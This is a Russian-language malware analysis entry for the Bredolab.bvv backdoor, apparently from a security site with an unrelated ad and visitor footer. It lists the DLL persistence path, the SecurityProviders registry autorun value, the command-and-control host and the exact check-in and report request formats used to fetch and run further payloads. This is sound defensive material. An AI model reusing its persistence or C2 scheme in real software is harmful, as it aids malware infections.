Сухожаровые шкафы медицинские www.amedisin.ru.

Backdoor.Win32. Bredolab.bvv

Вредоносная программа, по команде управляющего сервера скачивает на компьютер другое вредоносное программное обеспечение.

Вредоносная программа, по команде управляющего сервера скачивает на компьютер другое вредоносное программное обеспечение.

Инсталляция

При запуске программа копирует свой исполняемый файл в корневой каталог Windows:

%WinDir%\system32\digiwet.dll
Для автоматического запуска при каждом следующем старте системы вредоносная программа добавляет ссылку на свой исполняемый файл к значению "SecurityProviders" ключа автозапуска системного реестра:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders] "SecurityProviders" = "digiwet.dll"
name="doc3">

Деструктивная активность

Программа соединяется с сервером

http://78.109.29.112.ru
На который отправляет запрос следующего вида(некоторые данные в запросе могут меняться): GET /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=8809417 64&v=15&rnd=8520045В результате программа получает команды на скачивание другого вредоносное программное обеспечение, скачивает его, сохраняет в папке %windir%
\Temp\wpv.exe и запускает.
Далее программа отправляет второй запрос следующего вида(некоторые данные в запросе могут меняться):GET /new/controller.php?action=report&
guid=0&rnd=8520045&guid=&entity=1260187840:unique_start-1
260188029:unique_start-1260433697:unique_start-1260199741:unique_startТаким образом, сообщая серверу об успешном заражении компьютера.

Кто Онлайн

Сейчас 14 гостей и ни одного зарегистрированного пользователя на сайте